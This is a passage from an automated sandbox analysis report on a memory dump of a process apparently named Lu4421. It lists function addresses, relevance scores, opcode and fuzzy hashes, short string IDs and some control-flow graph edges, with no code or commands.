                                                                                  • Opcode ID: f8e76fe3cfdd01ded02e7cff195ca408ff2291500375c297a61d10c3dc4dd562
                                                                                  • Instruction ID: 964a2d40b281cc824ae998ae392252d81d283753271d49e5d46524c771df69d1
                                                                                  • Opcode Fuzzy Hash: f8e76fe3cfdd01ded02e7cff195ca408ff2291500375c297a61d10c3dc4dd562
                                                                                  • Instruction Fuzzy Hash: 7421B27BA00500CFD72C8F34C9027D937A5E399778F994E14CF2657B9DD63865229B80
                                                                                  Function 00007FFD9B7FA2E5 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _+t$ _+t
                                                                                  • API String ID: 0-1736200941
                                                                                  • Opcode ID: 40e1331d58851c35f80f2bf057de1fa6996b2911aef9792afc5280b27f942f67
                                                                                  • Instruction ID: 0bf8bd9c9e237c0a2882aa25070ae203e12a1505b5fee2ffe3e8b6fb12d5a62a
                                                                                  • Opcode Fuzzy Hash: 40e1331d58851c35f80f2bf057de1fa6996b2911aef9792afc5280b27f942f67
                                                                                  • Instruction Fuzzy Hash: 18514931A0E78E4FD756EBB488655EA7FF0EF42210B0501FAD849DB0E2DE2C6945C791
                                                                                  Function 00007FFD9B7FA181 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t$P_+t
                                                                                  • API String ID: 0-3736040502
                                                                                  • Opcode ID: 98e00ddf78f65682ddcda9e152bc1830caa20438758b4ce8e47162271f03386e
                                                                                  • Instruction ID: eeff4690dc584181f9d252b57a1176321760cd6011f7a9df78fe2fdd67043efd
                                                                                  • Opcode Fuzzy Hash: 98e00ddf78f65682ddcda9e152bc1830caa20438758b4ce8e47162271f03386e
                                                                                  • Instruction Fuzzy Hash: 6441E251B4E7CA4FE7669BB818311B57FA1DF87224B1A02FAD099CB1F7D80D1906C386
                                                                                  Function 00007FFD9B7F3BF8 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 578 7ffd9b7f3bf8-7ffd9b7f3c7a 581 7ffd9b7f3c7c-7ffd9b7f3cb1 578->581 582 7ffd9b7f3cc4-7ffd9b7f3cd9 578->582 587 7ffd9b7f3d27-7ffd9b7f3d30 581->587 588 7ffd9b7f3cb3-7ffd9b7f3cc1 581->588 585 7ffd9b7f3cdb-7ffd9b7f3cde 582->585 586 7ffd9b7f3d32-7ffd9b7f3d3c 582->586 589 7ffd9b7f3d5f 585->589 590 7ffd9b7f3ce0-7ffd9b7f3cef 585->590 595 7ffd9b7f3d3d-7ffd9b7f3d5a 586->595 587->586 588->582 592 7ffd9b7f3d60-7ffd9b7f3d62 589->592 590->592 597 7ffd9b7f3cf1-7ffd9b7f3cf6 590->597 600 7ffd9b7f3d6b-7ffd9b7f3d8a 592->600 597->595 598 7ffd9b7f3cf8-7ffd9b7f3d03 597->598 598->587
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \+t$\+t
                                                                                  • API String ID: 0-2059362047
                                                                                  • Opcode ID: de53dfbcff579e8eb02cb44fbef7ca9c74a7c481fbc7fee210a372a6637c6f73
                                                                                  • Instruction ID: caa62e269fd1d7d61ec1ef9b5a34febe0d5f92802296f5c4cb3092f2a948220d
                                                                                  • Opcode Fuzzy Hash: de53dfbcff579e8eb02cb44fbef7ca9c74a7c481fbc7fee210a372a6637c6f73
                                                                                  • Instruction Fuzzy Hash: 8F412630A0E78D4FD762A7B448255AA7FE0EF46220F5601FAD499CB1E3DE2C6806C752
                                                                                  Function 00007FFD9B7F3B18 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 602 7ffd9b7f3b18-7ffd9b7f3b3a 606 7ffd9b7f3b3c-7ffd9b7f3b43 602->606 607 7ffd9b7f3b44-7ffd9b7f3bb7 call 7ffd9b7f2660 602->607 606->607 612 7ffd9b7f3bbc-7ffd9b7f3bd5 607->612
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p\+t$x\+t
                                                                                  • API String ID: 0-2539556204
                                                                                  • Opcode ID: b9da49d2008321f39e573424b3e32efa5dcebcfb057ca26c7d0135689ca7b5db
                                                                                  • Instruction ID: 340a849a6211061adc18ea29e1abc1384d6daf61b7150f43ce42ff64da1b5a3f
                                                                                  • Opcode Fuzzy Hash: b9da49d2008321f39e573424b3e32efa5dcebcfb057ca26c7d0135689ca7b5db
                                                                                  • Instruction Fuzzy Hash: D1216631A0968D4FD746EBA498399E8BFE0EF55220F0602FBD459C70B2EA2825848791
                                                                                  Function 00007FFD9B7F3AAA Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `\+t$h\+t
                                                                                  • API String ID: 0-1804048514
                                                                                  • Opcode ID: aebee94842be331bddb517eee1459c9eea299dd5a73ad85e9c99563830696564
                                                                                  • Instruction ID: c9725f52011628fe1f01d55b36655c86faead7b61f878c08c00913fd4c01915e
                                                                                  • Opcode Fuzzy Hash: aebee94842be331bddb517eee1459c9eea299dd5a73ad85e9c99563830696564
                                                                                  • Instruction Fuzzy Hash: 24012420B0A60D4FE7559BA844645F87BE1FF15320B0202FAD858EB1F2EE1C2941C365
                                                                                  Function 00007FFD9B7F3A2E Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H_+t$P_+t
                                                                                  • API String ID: 0-3958952397
                                                                                  • Opcode ID: c8bd693f8d1676c927ec4cc317a91a38da899a9b76102981e7dafe2cf1274626
                                                                                  • Instruction ID: df6d8d800e74cdc07c829ac803a00e6a71f662d620d2a9853ce61de2cd82032e
                                                                                  • Opcode Fuzzy Hash: c8bd693f8d1676c927ec4cc317a91a38da899a9b76102981e7dafe2cf1274626
                                                                                  • Instruction Fuzzy Hash: 16E092617CA58A8FE701165CA8615E8F390EF92238F8500F6C4498F0D5D98D68879252
                                                                                  Function 00007FFD9B7F9EB5 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p\+t
                                                                                  • API String ID: 0-247848984
                                                                                  • Opcode ID: 81f765d8edd850a56b053be6fd8ad4dbf06185aa4166cf9e7bd63ca0788abffc
                                                                                  • Instruction ID: 8d2d30da40e5334bcf6b7d7c0f401ed5021a46f5e69628c000d7e06dfc0d74c2
                                                                                  • Opcode Fuzzy Hash: 81f765d8edd850a56b053be6fd8ad4dbf06185aa4166cf9e7bd63ca0788abffc
                                                                                  • Instruction Fuzzy Hash: 4D713D70B1990C9FDF94EB6CD499EA97BF1EFA9310B0541A9E00DD72A2DA24EC41CB40
                                                                                  Function 00007FFD9B7F9ED0 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p\+t
                                                                                  • API String ID: 0-247848984
                                                                                  • Opcode ID: 262bb9079f98ac7a513ed33a91b253821a43f24f7ee646f9ae25da5d0182e8ac
                                                                                  • Instruction ID: f0445586d96aa07d2cb24451a9f3ed2ad470add44e42061dc53506d5a9170535
                                                                                  • Opcode Fuzzy Hash: 262bb9079f98ac7a513ed33a91b253821a43f24f7ee646f9ae25da5d0182e8ac
                                                                                  • Instruction Fuzzy Hash: D6711B70B1990C9FDF94EB6CD499EAD7BF2EFA8311B0501A9E009D72A1DA64EC41CB40
                                                                                  Function 00007FFD9B7FE51C Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6+t
                                                                                  • API String ID: 0-2385610241
                                                                                  • Opcode ID: 3a97861784ae8f8e586227a452864d8d28389bd93ec5d0f87596a3fcadc37296
                                                                                  • Instruction ID: 8d2684f8a8028f1a2f1f0493cf6923c005a7489ab562693cb5777b64bef80be2
                                                                                  • Opcode Fuzzy Hash: 3a97861784ae8f8e586227a452864d8d28389bd93ec5d0f87596a3fcadc37296
                                                                                  • Instruction Fuzzy Hash: 2B811A71B0AA4E4FEB51EBB484655F97BE1EF59310B2101B9C44ACB1B7DE2CA942C740
                                                                                  Function 00007FFD9B8004E8 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Z+t
                                                                                  • API String ID: 0-1802297948
                                                                                  • Opcode ID: 5c92a36e7bc2faf30be48317944db255d391478b687ea18faa831838fe129c0b
                                                                                  • Instruction ID: 0426fe5e53308b0fc4c9c6f344be30273eea2d2ce030028e8fd21a05e4168605
                                                                                  • Opcode Fuzzy Hash: 5c92a36e7bc2faf30be48317944db255d391478b687ea18faa831838fe129c0b
                                                                                  • Instruction Fuzzy Hash: D541A430B18A4E8FDB95DF18C464BEA77E2FF98350F5844A9D45AC7296CE34E842CB41
                                                                                  Function 00007FFD9B7FFD85 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8\+t
                                                                                  • API String ID: 0-1348833482
                                                                                  • Opcode ID: 2b16228fec03769167f6749f19e2f3a2cdf4f4d3b2d8305745a290858414aa1e
                                                                                  • Instruction ID: 28e3002d5441d32c233981ae664f6416f2782067e8d0c5356d544afcc1f63fb7
                                                                                  • Opcode Fuzzy Hash: 2b16228fec03769167f6749f19e2f3a2cdf4f4d3b2d8305745a290858414aa1e
                                                                                  • Instruction Fuzzy Hash: 3E21832194E3CA1FD7539BB49C24AD67FF4DF47224B0A02EBD085CB0A3C55C4996C762
                                                                                  Function 00007FFD9B7FA3D0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _+t
                                                                                  • API String ID: 0-3347993059
                                                                                  • Opcode ID: 5e3062cc7cebbc38c6ddd044eb90424e630688866f6f5d56a414e844d6d0f044
                                                                                  • Instruction ID: e6ccd87a7a9d85dce51f11855ce2ca8359be7fad708982c2faa3d188b83d1091
                                                                                  • Opcode Fuzzy Hash: 5e3062cc7cebbc38c6ddd044eb90424e630688866f6f5d56a414e844d6d0f044
                                                                                  • Instruction Fuzzy Hash: 32212530A0A34E4FD796EBB484666E97BE0EF02264B4105FAD849DB0A6DA2C5984C391
                                                                                  Function 00007FFD9B7FA23D Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t
                                                                                  • API String ID: 0-4277016761
                                                                                  • Opcode ID: 989ed15be465fe7fefd3b55b2449a6c5b5d5d1e1533d3f000e434193fee60eb0
                                                                                  • Instruction ID: d300378d06c24b24f48dc804a00a96214c5747bdcee76bb1ad885427c9ffe355
                                                                                  • Opcode Fuzzy Hash: 989ed15be465fe7fefd3b55b2449a6c5b5d5d1e1533d3f000e434193fee60eb0
                                                                                  • Instruction Fuzzy Hash: E311E912B1EB8D0FE7A59B7C04752A83E92EFC5250B4A02BED04DCB2F7DD095E054395
                                                                                  Function 00007FFD9B7FA250 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t
                                                                                  • API String ID: 0-4277016761
                                                                                  • Opcode ID: fb006de72770f48d27fe98a72e8ca5483c0dd50745c226a8231b908f8fe0cb09
                                                                                  • Instruction ID: 59ce4ba5fae66285126dc4d4ba4f1c2c9c2fc780940b7076a94b7fa78ca644c8
                                                                                  • Opcode Fuzzy Hash: fb006de72770f48d27fe98a72e8ca5483c0dd50745c226a8231b908f8fe0cb09
                                                                                  • Instruction Fuzzy Hash: 0D11C611B1EA4D0FE7A9AA7C04256A92A92EFC5350B4503BED44EC72F6DD095D0243D5
                                                                                  Function 00007FFD9B7FA1E0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: P_+t
                                                                                  • API String ID: 0-2897342847
                                                                                  • Opcode ID: ced92cc5edad86fa01bbf0eccff189156ab93f58c5bd5d6cdf2b70648defec15
                                                                                  • Instruction ID: ca71d65ec0d5fa6ce2e78c88fcb4c1791d31107788fd16a043abdc4eaf794967
                                                                                  • Opcode Fuzzy Hash: ced92cc5edad86fa01bbf0eccff189156ab93f58c5bd5d6cdf2b70648defec15
                                                                                  • Instruction Fuzzy Hash: 1CF0BB20F1AA9E0FE765BBB828611BC79D1EF85324B4501FAD41DC72EADC1C5D8643C6
                                                                                  Function 00007FFD9B800643 Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Z+t
                                                                                  • API String ID: 0-1802297948
                                                                                  • Opcode ID: 8243099e6f99bac6c8ee5c64cff698c8850360205d5ea30727e46d0750022d13
                                                                                  • Instruction ID: 39477c613efd0557f07dc638821f9d646a1a2ea2a2c7289f8d95b5f9ef07f253
                                                                                  • Opcode Fuzzy Hash: 8243099e6f99bac6c8ee5c64cff698c8850360205d5ea30727e46d0750022d13
                                                                                  • Instruction Fuzzy Hash: 48D0A9A208BB822FD3438A6898D00E0BBC0EE0213436508DDC4C3AF0B2E10DADDBC311
                                                                                  Function 00007FFD9B7F2949 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H\+t
                                                                                  • API String ID: 0-995766358
                                                                                  • Opcode ID: 247a59f0abc534f3fff3f3675483c52d17f5b23f97182a61a1cd1617902e852b
                                                                                  • Instruction ID: 87167e28ab744cc2c18dd8989f019a6b9602f39e990227da3a13cf685bc63b28
                                                                                  • Opcode Fuzzy Hash: 247a59f0abc534f3fff3f3675483c52d17f5b23f97182a61a1cd1617902e852b
                                                                                  • Instruction Fuzzy Hash: 8DC08052187B559FD676C4A80C555A52FC4EE1257076502D49CA5DF5E1F50C584381C8
                                                                                  Function 00007FFD9B7FBAE2 Relevance: .3, Instructions: 336COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 46c2272a6184acca62e083eb44a4f2248e2a7548946506c107c8b80f72becc56
                                                                                  • Instruction ID: 19ab130775c0806bc3bc474b47d26479c4b885bcddccb392cfd34bb97ee8561c
                                                                                  • Opcode Fuzzy Hash: 46c2272a6184acca62e083eb44a4f2248e2a7548946506c107c8b80f72becc56
                                                                                  • Instruction Fuzzy Hash: 2AC1F430A0E78D8FD756ABB488614D9BFF0EF06320B2505FAC449DB1A7D92D9886C751
                                                                                  Function 00007FFD9B7F8766 Relevance: .3, Instructions: 327COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2f685c6c1bd904813cb558a2ff302505cd9c694bbab8f075d8a787f47fa16cae
                                                                                  • Instruction ID: 128ea16971133d2d4b802b9c34640e64263f62fbee357181ec93e8d247cbf9fe
                                                                                  • Opcode Fuzzy Hash: 2f685c6c1bd904813cb558a2ff302505cd9c694bbab8f075d8a787f47fa16cae
                                                                                  • Instruction Fuzzy Hash: 75B1C530619B8D8FDB69DF28C8557E93BE1EF55310F04426EE85DC72A2CA34A945CB82
                                                                                  Function 00007FFD9B7F9AD3 Relevance: .3, Instructions: 296COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f3e344c513a8d80759a337fda0302ca7fe559f39ff887fcc29aa00a62eec8cf5
                                                                                  • Instruction ID: e664247b21398071b3881af322f1cdaceedd8784acf7ad616bc7b93cf1b053ae
                                                                                  • Opcode Fuzzy Hash: f3e344c513a8d80759a337fda0302ca7fe559f39ff887fcc29aa00a62eec8cf5
                                                                                  • Instruction Fuzzy Hash: 7B816B32B0EA8A4FD765DB6C94A89B57BE1EF9535070902FAD04DC71B6DE18EC46C380
                                                                                  Function 00007FFD9B7F29F9 Relevance: .2, Instructions: 247COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5c6ada6c632abd2a4a795063e3166a749dab15e8404ee3c90bc8321a427967b2
                                                                                  • Instruction ID: 56a04347b0e9a8bdfc9753ad04fc8bcc1216170a5ff89e531d511fd525cf58e0
                                                                                  • Opcode Fuzzy Hash: 5c6ada6c632abd2a4a795063e3166a749dab15e8404ee3c90bc8321a427967b2
                                                                                  • Instruction Fuzzy Hash: 39917471F19A4D4FEBA9EB5888657E8B7B1FF58310F4102F9E05CD32A6DE3429818B41
                                                                                  Function 00007FFD9B800BFB Relevance: .2, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c306ed1cd235e73a2fa7e496efcb18eaadcdaa8c589d1de239f9a5d5c3435f5
                                                                                  • Instruction ID: 6058f555fb13f603a7dffd116c1195f93c7a6a617c649f88a18049ce0f47a685
                                                                                  • Opcode Fuzzy Hash: 6c306ed1cd235e73a2fa7e496efcb18eaadcdaa8c589d1de239f9a5d5c3435f5
                                                                                  • Instruction Fuzzy Hash: CF51D41BF0959A0AE31577BD79265EC3760DFC23BAB1942B7D18CCA0E78C18344682E2
                                                                                  Function 00007FFD9B7FE819 Relevance: .2, Instructions: 207COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 470986f92ea7994f152d77b5c155757766e5e608308909f3832709b61ce9977a
                                                                                  • Instruction ID: 4070a2cbb02f01c4490bc53dc31d934a19997cf70e94b7ee846b8d1d5898a7f5
                                                                                  • Opcode Fuzzy Hash: 470986f92ea7994f152d77b5c155757766e5e608308909f3832709b61ce9977a
                                                                                  • Instruction Fuzzy Hash: 7C610730A0E78A4FD756EBB484645E97FF1EF46320B1500FBD449CB1A3CA2D9986C752
                                                                                  Function 00007FFD9B7FB6B9 Relevance: .2, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 63f1d15bc0fde04ef85c0d0338edb7b8d9327117bd80da3ab81832e53d0c7c31
                                                                                  • Instruction ID: ffeea84b5a7c12231013402c7491bad727fa90d261f74bc91a2ec187987cc9f9
                                                                                  • Opcode Fuzzy Hash: 63f1d15bc0fde04ef85c0d0338edb7b8d9327117bd80da3ab81832e53d0c7c31
                                                                                  • Instruction Fuzzy Hash: CA819630B4E34E8BD761EBF044612F87F90AF02320F1642B5D449972F3DD6D66459AEA
                                                                                  Function 00007FFD9B7FC0A8 Relevance: .2, Instructions: 202COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57b51279131dbaddecba9a3ebe44b90d3ed54a1cbd5a7879652ff632685d6be5
                                                                                  • Instruction ID: 86706e2e72c0aeb029f3d34a34afdb73e34c4ebe73207d7288bb18d9e812e6c5
                                                                                  • Opcode Fuzzy Hash: 57b51279131dbaddecba9a3ebe44b90d3ed54a1cbd5a7879652ff632685d6be5
                                                                                  • Instruction Fuzzy Hash: B1513970A0E78E4FCB55EBB8C8215EA7FA0EF56320B0402FDD459CB1E6CA2D6516C790
                                                                                  Function 00007FFD9B7F528C Relevance: .2, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dc8fa0bd4c463abea1f38322e71e91cb94394cda965ec707b4ae33acd9872a81
                                                                                  • Instruction ID: dafacb04a36f2856295e0e77a77af0b2bd4ef77c539de9899cca3cbe16e87368
                                                                                  • Opcode Fuzzy Hash: dc8fa0bd4c463abea1f38322e71e91cb94394cda965ec707b4ae33acd9872a81
